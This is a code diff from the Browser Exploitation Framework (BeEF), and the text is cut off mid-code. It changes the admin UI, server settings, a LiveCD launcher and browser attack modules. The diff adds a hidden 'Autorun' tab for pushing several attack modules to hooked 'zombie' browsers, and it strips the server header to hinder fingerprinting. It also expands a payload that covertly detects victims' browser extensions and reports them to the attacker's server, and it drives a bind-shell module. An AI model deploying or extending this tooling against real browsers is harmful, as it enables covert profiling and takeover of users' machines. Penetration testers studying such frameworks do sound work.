     # @param [String] path URL path to mount the asset to (can be nil for random path)

core/main/network_stack/handlers/redirector.rb

@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module NetworkStack
+      module Handlers
+
+        # @note Redirector is used as a Rack app for mounting HTTP redirectors, instead of content
+        # @todo Add new options to specify what kind of redirect you want to achieve
+        class Redirector
+
+	        @target = "" 	
+
+	        def initialize(target)
+	        	@target = target
+	        end
+
+	        def call(env)
+	        	@response = Rack::Response.new(
+	        		body = ['302 found'],
+	        		status = 302,
+	        		header = {
+	        			'Content-Type' => 'text',
+	        			'Location' => @target
+	        		}
+	        	)
+	        end
+
+	        private
+
+	        @request
+
+	        @response
+
+	    end
+	end
+end
+end
+end

core/main/server.rb

@@ -4,6 +4,10 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
+# Remove Thin 'Server' response header
+Thin.send :remove_const, :SERVER
+Thin::SERVER = nil
+
 module BeEF
   module Core
 

extensions/admin_ui/controllers/panel/index.html

@@ -13,12 +13,16 @@
 	<%= script_tag 'ext-base.js' %>
 	<%= script_tag 'ext-all.js' %>
 	<%= script_tag 'ext-beef.js' %>
+
 	<!-- jQuery encoder (ESAPI way) -->
 	<%= script_tag 'esapi/jquery-1.6.4.min.js' %>
 	<%= script_tag 'esapi/Class.create.js' %>
 	<%= script_tag 'esapi/jquery-encoder-0.1.0.js' %>
 	<script type="text/javascript" language="JavaScript">var $jEncoder = jQuery.noConflict();</script>
-	<!--/ jQuery encoder (ESAPI way) -->
+
+    <!-- BeEF Web UI common functions-->
+    <%= script_tag 'ui/common/beef_common.js' %>
+
 	<%= script_tag 'ux/TabCloseMenu.js' %>
 	<%= script_tag 'ux/StatusBar.js' %>
 	<%= script_tag 'ux/PagingStore.js' %>
@@ -37,7 +41,7 @@
     <%= stylesheet_tag 'wterm.css' %>
     <script type="text/javascript" language="JavaScript">var $jwterm = jQuery.noConflict();</script>
     <%= script_tag 'ui/panel/tabs/ZombieTabIpec.js' %>
-
+    <%= script_tag 'ui/panel/tabs/ZombieTabAutorun.js' %>
     <%= script_tag 'ui/panel/PanelViewer.js' %>
 	<%= script_tag 'ui/panel/DataGrid.js' %>
 	<%= script_tag 'ui/panel/MainPanel.js' %>
@@ -45,7 +49,6 @@
 	<%= script_tag 'ui/panel/ZombieTabs.js' %>
 	<%= script_tag 'ui/panel/zombiesTreeList.js' %>
 	<%= script_tag 'ui/panel/ZombiesMgr.js' %>
-	
 	<%= script_tag 'ui/panel/Logout.js' %>
 	<%= script_tag 'ui/panel/WelcomeTab.js' %>
 	<!-- <%= script_tag 'ui/panel/HackVertorTab.js' %> -->

extensions/admin_ui/media/javascript/ui/common/beef_common.js

@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * BeEF Web UI commons
+ */
+
+if(typeof beefwui === 'undefined' && typeof window.beefwui === 'undefined') {
+
+    var BeefWUI = {
+
+        rest_token: "",
+
+        /**
+         * Retrieve the token needed to call the RESTful API.
+         * This is obviously a post-auth call.
+         */
+        get_rest_token: function() {
+            if(this.rest_token.length == 0){
+                var url = "/ui/modules/getRestfulApiToken.json";
+                jQuery.ajax({
+                    contentType: 'application/json',
+                    dataType: 'json',
+                    type: 'GET',
+                    url: url,
+                    async: false,
+                    processData: false,
+                    success: function(data){
+                        beefwui.rest_token = data.token;
+                    },
+                    error: function(){
+                        beefwui.rest_token = "";
+                    }
+                });
+            }
+            return this.rest_token;
+        }
+    };
+
+    window.beefwui = BeefWUI;
+}

extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js

@@ -5,16 +5,14 @@
 //
 
 ZombieTab = function(zombie) {
-	
 	main_tab = new ZombieTab_DetailsTab(zombie);
 	log_tab = new ZombieTab_LogTab(zombie);
 	commands_tab = new ZombieTab_Commands(zombie);
 	requester_tab = new ZombieTab_Requester(zombie);
     xssrays_tab =  new ZombieTab_XssRaysTab(zombie);
     ipec_tab = new ZombieTab_IpecTab(zombie);
-
-
-    ZombieTab.superclass.constructor.call(this, {
+    autorun_tab = new ZombieTab_Autorun(zombie);
+	ZombieTab.superclass.constructor.call(this, {
         id:"current-browser",
 		activeTab: 0,
 		loadMask: {msg:'Loading browser...'},
@@ -25,7 +23,13 @@ ZombieTab = function(zombie) {
 			forceFit: true,
 			type: 'fit'
 		},
-		items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab]
+		items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab, autorun_tab],
+        listeners:{
+            afterrender:function(component){
+                // Hide auto-run tab
+                component.hideTabStripItem(autorun_tab);
+            }
+        }
 	});
 };
 

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js

@@ -0,0 +1,336 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+/*
+ * The command tab panel. Listing the list of commands sent to the zombie.
+ * Loaded in /ui/panel/index.html
+ */
+function generate_form_input_field(form, input, value, disabled, zombie) {
+    var input_field = null;
+    var input_def = null;
+    if (!input['ui_label'])
+        input['ui_label'] = input['name'];
+
+    if (!input['type'])
+        input['type'] = 'textfield';
+
+    if (!input['value'])
+        input['value'] = '';
+
+    input_def = {
+        id: 'form-zombie-'+zombie.session+'-field-'+input['name'],
+        name: 'txt_'+input['name'],
+        fieldLabel: input['ui_label'],
+        anchor:'70%',
+        allowBlank: false,
+        value: input['value']
+    };
+
+        // create the input field object based upon the type supplied
+    switch(input['type'].toLowerCase()) {
+        case 'textfield':
+            input_field = new Ext.form.TextField(input_def);
+            break;
+        case 'textarea':
+            input_field = new Ext.form.TextArea(input_def);
+            break;
+        case 'hidden':
+            input_field = new Ext.form.Hidden(input_def);
+            break;
+        case 'label':
+            input_def['fieldLabel'] = '';
+            input_def['html'] = input['html'];
+            input_field = new Ext.form.Label(input_def);
+            break;
+        case 'checkbox':
+            input_def['name'] = 'chk_' + input['name'];
+            input_field = new Ext.form.Checkbox(input_def);
+            break;
+        case 'checkboxgroup':
+            input_def['name'] = 'chkg_' + input['name'];
+            input_def['items'] = input['items'];
+            input_field = new Ext.form.CheckboxGroup(input_def);
+            break;
+        case 'combobox':
+            input_def['name'] = 'com_' + input['name'];
+            input_def['triggerAction'] = 'all';
+
+            if(input.reloadOnChange || input.defaultPayload != null) {
+                // defined in msfcommand.rb
+                // initially the panel will be empty so it may appear still hidden
+                Ext.getCmp("payload-panel").show();
+                input_def['listeners'] = {
+                    // update the payload options when one of them is selected
+                    'select': function(combo, value) {
+                        get_dynamic_payload_details(combo.getValue(), zombie);
+                    },
+                    // set the default payload value as defined in defaultPayload
+                    'afterrender': function(combo){
+                        combo.setValue(input.defaultPayload);
+                        get_dynamic_payload_details(combo.getValue(),zombie);
+                    }
+                };
+            }
+
+            // create store to contain options for the combo box
+            input_def['store']  = new Ext.data.ArrayStore( {
+                fields: input['store_fields'],
+                data: input['store_data']
+            });
+
+            input_field = new Ext.form.ComboBox(input_def);
+            break;
+
+       default:
+            input_field = new Ext.form.TextField(input_def);
+            break;
+        }
+
+    // add the properties for the input element, for example: widths, default values and the html lables
+    for(definition in input) {
+        if( (typeof input[definition] == 'string') && (definition != 'type') && (definition != 'name')) {
+            input_field[definition] = input[definition];
+        }
+    }
+
+    if(value)
+         input_field.setValue(value);
+    if(disabled)
+        input_field.setDisabled(true);
+
+    form.add(input_field);
+}
+
+function get_module_details(id,token){
+    var mod = null;
+    var url = "/api/modules/"+id+"?token="+token;
+    $jwterm.ajax({
+        contentType: 'application/json',
+        dataType: 'json',
+        type: 'GET',
+        url: url,
+        async:false,
+        processData: false,
+        success: function(data){
+            mod = data;
+        }
+    });
+    //add module id which is not returned by the RESTful API
+    mod['id'] = id;
+    return mod;
+}
+
+function process_module_opts(mod){
+    var mod_json = {
+       'mod_id': mod['id'],
+       'mod_input':[]
+    };
+   var opts = mod['options'];
+   var label='ui_label';
+   var type = 'type';
+   var type_val;
+   var label_val;
+   var value;
+   var type;
+   var key = value = label = type_val = "";
+   var input;
+
+   if(opts.length > 0){
+       for( var i=0;i<opts.length;i++){
+           input = {};
+           key = opts[i]['name'];
+           value = opts[i]['value'];
+           type_val = opts[i]['type'];
+           label_val = opts[i][label];
+           input[key]=value;
+           input[label]=label_val;
+           input[type] = type_val;
+           mod_json['mod_input'].push(input);
+       }
+   }
+   return mod_json;
+}
+
+function send_modules(token,module_data){
+    var url = "/api/modules/multi_module"+"?token="+token;
+    var payload = Ext.encode(module_data);
+    $jwterm.ajax({
+        contentType: 'application/json',
+        data: payload,
+        dataType: 'json',
+        type: 'POST',
+        url: url,
+        async:false,
+        processData: false,
+        success: function(data){
+            var results = data;
+        }
+    });
+}
+
+    /* Creates the same tree as the command module list*/
+ZombieTab_Autorun = function(zombie) {
+
+    var token = beefwui.get_rest_token();
+
+    var details_panel = new Ext.FormPanel({
+        id: "zombie-autorun_details"+zombie.session,
+        title: "Module Details",
+        region:'west',
+        border: true,
+        width: 250,
+        minSize: 250,
+        maxSize: 500
+    });
+
+    var list_panel = new Ext.Panel({
+        id: "zombie-autorun-list"+zombie.session,
+        title: "Selected Modules",
+        region:'west',
+        border: true,
+        width: 190,
+        minSize: 190,
+        maxSize: 500
+    });
+
+    var command_module_tree = new Ext.tree.TreePanel({
+        id: "zombie-autorun-modules"+zombie.session,
+        title: "Module Tree",
+        border: true,
+        region: 'west',
+        width: 190,
+        minSize: 190,
+        maxSize: 500, // if some command module names are even longer, adjust this value
+        useArrows: true,
+        autoScroll: true,
+        animate: true,
+        containerScroll: true,
+        rootVisible: false,
+        root: {nodeType: 'async'},
+        buttons:[new Ext.Button({
+            text:'Execute',
+            hidden:false,
+            handler:function(){
+                var tree = Ext.getCmp('zombie-autorun-modules'+zombie.session);
+                var sel_nodes = tree.getChecked();
+                if(sel_nodes.length > 0){
+                    sel_nodes.forEach(function(item){
+                        if(item.hasChildNodes())
+                            sel_nodes.remove(item)
+                    });
+
+                    var mods_to_send = {
+                        'hb':zombie.session,
+                        'modules':[]
+                    };
+
+                    Ext.each(sel_nodes,function(item){
+                        var id = item.id;
+                        var module = get_module_details(id,token);
+                        module = process_module_opts(module);
+                        mods_to_send['modules'].push(module);
+                    });
+                    send_modules(token,mods_to_send);
+                }else {
+                    //TODO: handle this case
+                }
+         }})],
+         loader: new Ext.tree.TreeLoader({
+                dataUrl: '/ui/modules/select/commandmodules/tree.json',
+                baseParams: {zombie_session: zombie.session},
+                createNode: function(attr) {
+                if(attr.checked == null){attr.checked = false;}
+                        return Ext.tree.TreeLoader.prototype.createNode.call(this, attr);
+            },
+            listeners:{
+                beforeload: function(treeloader, node, callback) {
+                // Show loading mask on body, to prevent the user interacting with the UI
+                    treeloader.treeLoadingMask = new Ext.LoadMask(Ext.getBody(),{msg:"Please wait, command tree is loading..."});
+                    treeloader.treeLoadingMask.show();
+                    return true;
+                },
+                load: function(treeloader, node, response) {
+                       // Hide loading mask after tree is fully loaded
+                       treeloader.treeLoadingMask.hide();
+                       //if(node.parentNode.isChecked())
+                         node.getUI().toggleCheck();
+                          return true;
+                 }
+            }
+        }),
+        listeners: {
+            'click': function(node) {
+                if(!node.hasChildNodes()){
+                    details_panel.removeAll();
+                    details_panel.doLayout();
+                    // needs to be a functions (get_module_opts)
+                    var id = node.id;
+                    var module = get_module_details(id,token);
+                    if(!module){
+                        Ext.beef.msg("Module is null");
+                    }
+
+                    var inputs = module['options'];
+                    Ext.each(inputs,function(item){
+                        generate_form_input_field(details_panel,item,item['value'],false,zombie);
+                    });
+
+                    details_panel.doLayout();
+               }
+            },
+            'afterrender' : function() {},
+            'selectionchange' : function() {},
+            'activate' : function() {},
+            'select' : function() {},
+            'keyup' : function() {},
+            'render' : function(c) { c.getEl().on('keyup', function() {});},
+            'checkchange':function(node,check){
+                if(check){
+                    // expand and select all nodes under a parent
+                    if(node.isExpandable())
+                        node.expand();
+                        node.cascade(function(n){
+                        if(!n.getUI().isChecked())
+                            n.getUI().toggleCheck();
+                    });
+                }
+                // Collapse and deselect all children under the parent
+                else{
+                    node.cascade(function(n){
+                    if(n.getUI().isChecked())
+                        n.getUI().toggleCheck();
+                    });
+                    node.collapse();
+                }
+            }
+        }
+    });
+
+    ZombieTab_Autorun.superclass.constructor.call(this, {
+        id: 'zombie-'+zombie.session+'-autorun-panel',
+        title:'Autorun',
+        layout: 'hbox',
+        hidden: true,
+        layoutConfig:{align:'stretch'},
+        region: 'center',
+        selModel:Ext.tree.MultiSelectionModel,
+        items:[command_module_tree,details_panel]
+    });
+};
+
+Ext.extend(ZombieTab_Autorun, Ext.Panel, {
+    listeners: {close: function(panel) {}}
+});
+

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js

@@ -19,27 +19,6 @@ ZombieTab_IpecTab = function(zombie) {
         autoscroll: true
 	});
 
-    function get_rest_token(){
-        var token = "";
-        var url = "/ui/modules/getRestfulApiToken.json";
-        $jwterm.ajax({
-            contentType: 'application/json',
-            dataType: 'json',
-            type: 'GET',
-            url: url,
-            async: false,
-            processData: false,
-            success: function(data){
-                token = data.token;
-                console.log(token);
-            },
-            error: function(){
-                console.log("Error getting RESTful API token");
-            }
-        });
-        return token;
-    }
-
     function get_module_id(name, token){
         var id = "";
         var url = "/api/modules/search/" + name + "?token=" + token;
@@ -115,7 +94,7 @@ ZombieTab_IpecTab = function(zombie) {
                 var cmd = tokens.join(' '); //needed in case of commands with options
                 cmd = cmd.replace(/\\/g, '\\\\'); //needed to prevent JS errors (\ need to be escaped)
 
-                var token = get_rest_token();
+                var token = beefwui.get_rest_token();
                 var mod_id = get_module_id("BeEF_bind_shell", token);
 
                 var uri = "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token;
@@ -148,7 +127,7 @@ ZombieTab_IpecTab = function(zombie) {
 
                 if(command_id != null){
 
-                    var token = get_rest_token();
+                    var token = beefwui.get_rest_token();
                     var mod_id = get_module_id("BeEF_bind_shell", token);
 
                     var uri_results = "/api/modules/" + zombie.session + "/" + mod_id + "/"

extensions/evasion/config.yaml

@@ -9,7 +9,7 @@ beef:
             enable: true
             name: 'Evasion'
             authors: ["antisnatchor"]
-            exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
+            exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js", "lib/mdetect.js"]
             scramble_variables: true
             scramble_cookies: true
             scramble:

extensions/metasploit/config.yaml

@@ -29,6 +29,7 @@ beef:
             auto_msfrpcd_timeout: 120
             msf_path: [ 
               {os: 'osx', path: '/opt/local/msf/'},
+              {os: 'livecd', path: '/opt/metasploit-framework/'},
               {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
               {os: 'bt5', path: '/opt/framework3/msf3/'},
               {os: 'backbox', path: '/opt/metasploit3/msf3/'},

extensions/qrcode/qrcode.rb

@@ -13,18 +13,43 @@ module Qrcode
     
     def self.pre_http_start(http_hook_server)
       require 'uri'
-      
+
+      fullurls = []
+      partialurls = []
+
       configuration = BeEF::Core::Configuration.instance
-      BeEF::Core::Console::Banners.interfaces.each do |int|
-        next if int == "localhost" or int == "127.0.0.1"
-        print_success "QRCode images available for interface: #{int}"
+
+      configuration.get("beef.extension.qrcode.target").each do |target|
+        if target.lines.grep(/^https?:\/\//i).size > 0
+          fullurls << target
+        else
+          partialurls << target
+        end
+      end
+
+      if fullurls.size > 0
+        print_success "Custom QRCode images available:"
         data = ""
-        configuration.get("beef.extension.qrcode.target").each do |target|
-          url = "http://#{int}:#{configuration.get("beef.http.port")}#{target}"
-          url = URI.escape(url,Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))
+        fullurls.each do |target|
+          url = URI.escape(target,Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))
           data += "https://chart.googleapis.com/chart?cht=qr&chs=#{configuration.get("beef.extension.qrcode.qrsize")}&chl=#{url}\n"
         end
         print_more data
+
+      end
+      
+      if partialurls.size > 0
+        BeEF::Core::Console::Banners.interfaces.each do |int|
+          next if int == "localhost" or int == "127.0.0.1"
+          print_success "QRCode images available for interface: #{int}"
+          data = ""
+          partialurls.each do |target|
+            url = "http://#{int}:#{configuration.get("beef.http.port")}#{target}"
+            url = URI.escape(url,Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))
+            data += "https://chart.googleapis.com/chart?cht=qr&chs=#{configuration.get("beef.extension.qrcode.qrsize")}&chl=#{url}\n"
+          end
+          print_more data
+        end
       end
     end  
     

liveCD/BeEFLive.sh

@@ -0,0 +1,307 @@
+#!/bin/bash
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'home/beef/doc/COPYING' for copying permission
+#
+
+   
+#
+# This is the auto startup script for the BeEF Live CD. 
+# IT SHOULD ONLY BE RUN ON THE LIVE CD
+# Download LiveCD here: http://beefproject.com/BeEFLive1.2.iso
+# MD5 (BeEFLive1.2.iso) = 1bfba0942a3270ee977ceaeae5a6efd2
+#
+# This script contains a few fixes to make BeEF play nicely with the way  
+# remastersys creates the live cd distributable as well as generating host keys 
+# to enable SSH etc. The script also make it easy for the user to update/start 
+# the BeEF server
+#
+
+#
+# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
+# (if they do not yet exist)
+#
+f1="beef"
+if [ -f $f1 ] ; then
+	echo ""
+else
+	ln -s /opt/beef/ beef
+	ln -s /opt/metasploit-framework/ msf
+	ln -s /opt/sqlmap/ sqlmap
+fi
+
+#
+# function to allow BeEF to run in the background
+#
+run_beef() {	
+	cd /opt/beef/
+	ruby beef -x
+}
+
+#
+# function to start msf and run in the background
+#
+run_msf() {	
+	# start msf
+	/opt/metasploit-framework/msfconsole -r /opt/beef/test/thirdparty/msf/unit/BeEF.rc 2> /dev/null
+}
+
+#
+# functions to enable or disable msf integration
+#
+enable_msf() {
+	# enable msf integration in main config file
+	sed -i '1N;$!N;s/metasploit:\n\s\{1,\}enable:\sfalse/metasploit:\n            enable: true/g;P;D' /opt/beef/config.yaml
+	# enable auto_msfrpcd
+	sed -i 's/auto_msfrpcd:\sfalse/auto_msfrpcd: true/g' /opt/beef/extensions/metasploit/config.yaml	
+}
+disable_msf() {
+	# disable msf integration in main config file
+	sed -i '1N;$!N;s/metasploit:\n\s\{1,\}enable:\strue/metasploit:\n            enable: false/g;P;D' /opt/beef/config.yaml
+	# disable auto_msfrpcd
+	sed -i 's/auto_msfrpcd:\strue/auto_msfrpcd: false/g' /opt/beef/extensions/metasploit/config.yaml
+}
+
+#
+# function to exit cleanly
+#
+# trap ctrl-c and call close_bash()
+trap close_bash_t INT
+
+close_bash_t() {
+	# beef would have quit
+	back_running="0"
+	close_bash
+}
+close_bash() {
+	echo ""	
+	echo "Are you sure you want to exit the LiveCD? (y/N): "
+	read var
+	if [ $var = "y" ] ; then
+		disable_msf
+		exit
+	else		
+		show_menu
+	fi
+}
+
+# set default values
+bac="0"
+
+
+
+#
+# User Menu Loop
+#
+show_menu() {
+	while true; do
+		clear
+		echo "======================================"
+		echo "          BeEF Live CD   "
+		echo "======================================"
+		echo ""
+		echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
+		echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
+		echo "See the file 'home/beef/doc/COPYING' for copying permission"
+		echo ""
+		
+		echo "Welcome to the BeEF Live CD" 
+		echo "" 
+		
+		
+		#
+		# Check for SSH Host Keys - if they do not exist SSH will be displayed as disabled 
+		# (remastersys has a habit of deleting them during Live CD Creation)
+		#
+		f1="/etc/ssh/ssh_host_rsa_key"
+		if [ -f $f1 ] ; then
+			echo "[1] Disable SSH                              [Currently Enabled]"
+		else 
+			echo "[1] Enable SSH                               [Currently Disabled]"
+		fi
+		
+			echo "[2] Update BeEF"
+			echo "[3] Update sqlMap                            (Bundled with LiveCD)"
+			echo "[4] Update metasploit-framework              (Bundled with LiveCD)"
+			echo ""
+		if [ "$bac" = "1" ] ; then
+			echo "[5] Disable BeEF in background mode          [Currently Enabled]"
+		else
+			echo "[5] Enable BeEF in background mode           [Currently Disabled]"
+		fi
+		
+		if [ "$sqlm" = "1" ] ; then
+			echo "[6] Disable sqlMap demo                      [Currently Enabled]"
+		else
+			echo "[6] Enable sqlMap demo                       [Currently Disabled]"
+		fi
+		
+		if [ "$msf" = "1" ] ; then
+			echo "[7] Disable metasploit-framework integration [Currently Enabled]"
+		else
+			echo "[7] Enable metasploit-framework integration  [Currently Disabled]"
+		fi
+			echo ""
+			echo "[q] Quit to terminal"
+			echo ""
+		if [ "$back_running" = "1" ] ; then	
+			echo "[k] End BeEF process [BeEF running in background mode]"
+		else
+			echo "[b] Run BeEF"
+		fi
+			echo ""
+			echo -n "BeEF Live ~# "
+			read var
+		
+		#
+		# Quit liveCD loop
+		#	
+		if [ $var = "q" ] ; then
+			 close_bash
+		fi
+		
+		#
+		# Create SSH Keys to enable SSH or Delete the Keys to disable
+		#
+		if [ $var = "1" ] ; then
+			if [ -f $f1 ]
+			then
+				sudo rm /etc/ssh/ssh_host_rsa_key
+				sudo rm /etc/ssh/ssh_host_dsa_key 
+			else
+				 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
+				 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
+				 echo ""
+				 echo "Please provide a password for ssh user: beef"
+				 sudo passwd beef
+				 echo "ssh enabled"
+			 fi
+		fi
+		
+		#
+		# Update BeEF from github repository
+		#	
+		if [ $var = "2" ] ; then
+			 cd /opt/beef
+			 git stash
+			 git pull
+			 msf="0"
+		fi
+		
+		#
+		# Update sqlmap from github repository
+		#	
+		if [ $var = "3" ] ; then
+			 cd /opt/sqlmap
+		 	 git stash
+			 git pull
+		fi
+		
+		#
+		# Update msf from github repository
+		#
+		if [ $var = "4" ] ; then
+			 cd /opt/metasploit-framework
+			 git stash
+			 git pull
+		fi
+		
+		#
+		# set BeEF to run in the background
+		#
+		if [ $var = "5" ] ; then
+			if [ "$bac" = "1" ] ; then
+			 	bac="0"
+			 	# check and disable sqlmap (requires beef run in the background)
+			 	sqlm="0"
+			else 
+				bac="1"
+			fi
+		fi
+		
+		#
+		# enable the sqlmap demo
+		#
+		if [ $var = "6" ] ; then
+			if [ "$sqlm" = "1" ] ; then
+			 	sqlm="0"
+			else 
+				sqlm="1"
+				# requires BeEF be run in the background
+				bac="1"
+			fi
+		fi
+		
+		#
+		# enable the msf integration
+		#
+		if [ $var = "7" ] ; then
+			if [ "$msf" = "1" ] ; then
+			 	msf="0"
+			 	disable_msf
+			else 
+				msf="1"
+				enable_msf
+			fi
+		fi
+		
+		#
+		# end background beef process
+		#
+		if [ $var = "k" ] ; then
+			pkill -x 'ruby'
+			back_running="0"
+		fi
+		
+		#
+		# Run BeEF
+		#
+		if [ $var = "b" ] ; then
+			
+			if [ "$msf" = "1" ] ; then
+				#
+				# First start msf if it is enabled
+				#
+				printf "Starting MSF (wait 45 seconds)..."
+				run_msf &
+				sleep 45
+			fi
+			
+			if [ "$bac" = "1" ] ; then
+				#
+				# run beef in the background
+				#
+			 	run_beef &
+				sleep 5
+				echo ""
+				echo "BeEF is running in the background, returning to the menu or running something else now..."
+				sleep 15
+				back_running="1"
+				#
+				# If the user has enabled it start sqlmap using beef as proxy
+				#
+				if [ $sqlm = "1" ] ; then
+					echo ""
+					echo "sqlMAP can now be run using the --proxy command set to the BeEF Proxy: http://127.0.0.1:6789 starting the wizard to demo with:"
+					echo "python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard"
+					sleep 5
+					python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard
+				fi
+			else 
+				#
+				# run beef in the foreground
+				#
+				cd /opt/beef/
+				ruby beef -x
+			fi
+		fi	
+			
+	done
+}
+
+# show user menu
+show_menu
+
+
+

modules/browser/avant_steal_history/module.rb

@@ -21,7 +21,7 @@ class Avant_steal_history < BeEF::Core::Command
 		
 
 		return [
-			{'name' => 'cId', 'ui_label' => 'Command ID:', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
+			{'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
 		]
 
 	end

modules/browser/detect_extensions/command.js

@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-	extensions = new Array(
+	chrome_extensions = new Array(
 		new Array("blpcfgokakmgnkcojhhkbfbldkacnbeo","YouTube"),
 		new Array("pjkljhegncpnkpknbcohdijeoejaedia","Gmail"),
 		new Array("coobgpohoikkiipiblmjeljniedjpjpf","Google Search"),
@@ -1009,7 +1009,61 @@ beef.execute(function() {
 		new Array("inolmjbojghkehmmlbdmpdlmagalddni","Jagran - India No.1 Hindi News Daily")
 	);
 
-	var detect = function(addon_id, addon_name) {
+        var firefox_extensions = {
+                "Adblock Plus" : "chrome://adblockplus/skin/adblockplus.png",
+                "Auto Copy" : "chrome://autocopy/skin/autocopy.png",
+                "ColorZilla" : "chrome://colorzilla/skin/logo.png",
+                "Customize Google" : "chrome://customizegoogle/skin/32x32.png",
+                "DownThemAll!" : "chrome://dta/content/immagini/icon.png",
+                "Faster Fox" : "chrome://fasterfox/skin/icon.png",
+                "Flash Block" : "chrome://flashblock/skin/flash-on-24.png",
+                "FlashGot" : "chrome://flashgot/skin/icon32.png",
+                "Forecastfox" : "chrome://forecastfox/skin/images/icon.png",
+                "Google Toolbar" : "chrome://google-toolbar/skin/icon.png",
+                "Greasemonkey" : "chrome://greasemonkey/content/status_on.gif",
+                "IE Tab" : "chrome://ietab/skin/ietab-button-ie16.png",
+                "IE View" : "chrome://ieview/skin/ieview-icon.png",
+                "JS View" : "chrome://jsview/skin/jsview.gif",
+                "Live HTTP Headers" : "chrome://livehttpheaders/skin/img/Logo.png",
+                "MeasureIt" : "chrome://measureit/skin/measureit.png",
+                "SEO For Firefox" : "chrome://seo4firefox/content/icon32.png",
+                "SEOpen" : "chrome://seopen/skin/seopen.png",
+                "Search Status" : "chrome://searchstatus/skin/cax10.png",
+                "Server Switcher" : "chrome://switcher/skin/icon.png",
+                "StumbleUpon" : "chrome://stumbleupon/content/skin/logo32.png",
+                "Tab Mix Plus" : "chrome://tabmixplus/skin/tmp.png",
+                "Torrent-Search Toolbar" : "chrome://torrent-search/skin/v.png",
+                "User Agent Switcher" : "chrome://useragentswitcher/content/logo.png",
+                "View Source With" : "chrome://viewsourcewith/skin/ff/tb16.png",
+                "Web Developer" : "chrome://webdeveloper/content/images/logo.png",
+                "Unhide Passwords" : "chrome://unhidepw/skin/unhidepw.png",
+                "UrlParams" : "chrome://urlparams/skin/urlparams32.png",
+                "NewsFox" : "chrome://newsfox/skin/images/home.png",
+                "Add N Edit Cookies" : "chrome://addneditcookies/skin/images/anec32.png",
+                "GTDGmail" : "chrome://gtdgmail/content/gtd_lineitem.png",
+                "QuickJava" : "chrome://quickjava/content/js.png",
+                "Adblock Filterset.G Updater" : "chrome://unplug/skin/unplug.png",
+                "BBCode" : "chrome://bbcode/skin/bbcode.png",
+                "BugMeNot" : "chrome://bugmenot/skin/bugmenot.png",
+                "ConQuery" : "chrome://conquery/skin/conquery.png",
+                "Download Manager Tweak" : "chrome://downloadmgr/skin/downloadIcon.png",
+                "Extended Cookie Manager" : "chrome://xcm/content/allowed.png",
+                "FireBug" : "chrome://firebug/content/firebug32.png",
+                "FoxyTunes" : "chrome://foxytunes/skin/logo.png",
+                "MR Tech Disable XPI Install Delay" : "chrome://disable_xpi_delay/content/icon.png",
+                "SessionSaver .2" : "chrome://sessionsaver/content/ss.png",
+                "spooFX" : "chrome://spoofx/skin/main/spoofx.png",
+                "Statusbar Clock" : "chrome://timestatus/skin/icon.png",
+                "Torbutton" : "chrome://torbutton/skin/bigbutton_gr.png",
+                "UnPlug" : "chrome://unplug/skin/unplug.png",
+                "View Source Chart" : "chrome://vrs/skin/vrssmall.png",
+                "XPather" : "chrome://xpather/content/iconka.png",
+                "WOT" : "chrome://wot/skin/fusion/logo.png",
+                "LastPass" : "chrome://lastpass/skin/vaultdelete.png",
+
+        };
+
+	var detect_chrome_extension = function(addon_id, addon_name) {
 		var s = document.createElement('script');
 		s.onload = function() {
 			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension='+addon_name);
@@ -1018,11 +1072,29 @@ beef.execute(function() {
 		document.body.appendChild(s);
 	}
 
-	try {
-		for (var i=0; i<extensions.length; i++) {
-			detect(extensions[i][0], extensions[i][1]);
-		}
-	} catch(e) {}
+        var detect_firefox_extension = function(addon_url, addon_name) {
+                var img = document.createElement("img");
+                img.setAttribute("border", '0');
+                img.setAttribute("width", '0');
+                img.setAttribute("height", '0');
+                img.setAttribute("onload", "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension=" + addon_name+ "');");
+                img.setAttribute("src", addon_url);
+        }
+
+        if(beef.browser.isC()) {
+                try {
+                        for (var i=0; i<chrome_extensions.length; i++) {
